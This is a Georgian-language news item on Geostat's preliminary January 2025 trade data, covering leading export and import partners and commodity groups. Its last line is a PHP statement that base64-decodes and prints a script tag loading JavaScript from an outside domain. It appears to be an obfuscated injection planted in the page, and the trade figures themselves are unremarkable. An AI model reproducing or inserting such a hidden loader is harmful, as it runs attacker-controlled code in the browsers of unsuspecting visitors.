gorgia
ავერსი jaluzi

სტატისტიკის ეროვნული სამსახურის წინასწარი მონაცემებით, 2025 წლის იანვარში ათი უმსხვილესი საექსპორტო პარტნიორი ქვეყნის წილმა საქართველოს მთლიან ექსპორტში 76.7 პროცენტი შეადგინა. უმსხვილეს საექსპორტო სამეულში პირველ ადგილს ყირგიზეთი იკავებს 74.9 მლნ აშშ დოლარით, მეორე ადგილზეა აზერბაიჯანი 46.2 მლნ აშშ დოლარით, ხოლო მესამეზე – ყაზახეთი 45.2 მლნ აშშ დოლარით.

რაც შეეხება იმპორტს, უწყების მონაცემებით, 2025 წლის იანვარში ათი უმსხვილესი საიმპორტო პარტნიორი ქვეყნის წილმა საქართველოს მთლიან იმპორტში 79.5 პროცენტი შეადგინა. პირველ სამეულში შედიან: აშშ 357.3 მლნ აშშ დოლარით, გაერთიანებული სამეფო 266.9 მლნ აშშ დოლარით და თურქეთი 172.9 მლნ. აშშ დოლარით.

ამასთან, უწყების ანგარიშის მიხედვით, 2025 წლის იანვარში სასაქონლო ჯგუფებიდან საექსპორტო ათეულში პირველი ადგილი დაიკავა მსუბუქმა ავტომობილებმა 130.0 მლნ აშშ დოლარით, რაც მთელი ექსპორტის 32.2 პროცენტს შეადგენს. მეორე ადგილს იკავებს სპირტიანი სასმელები 14.3 მლნ აშშ დოლარით, ხოლო მესამე ადგილზეა სპილენძის მადნები და კონცენტრატები 13.8 მლნ აშშ დოლარით.

საქსტატის ცნობით, უმსხვილესი საიმპორტო სასაქონლო ჯგუფი 2025 წლის იანვარში წარმოდგენილი იყო სურათები, ნახატები და პასტელების (ხელით შესრულებული) სახით, რომლის იმპორტმა 481.1 მლნ აშშ დოლარი და მთელი იმპორტის 30.0 პროცენტი შეადგინა. მეორე ადგილს იკავებს მსუბუქი ავტომობილები 151.0 მლნ აშშ დოლარით, ხოლო მესამე ადგილზეა ნავთობი და ნავთობპროდუქტები 106.9 მლნ აშშ დოლარით.

184
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");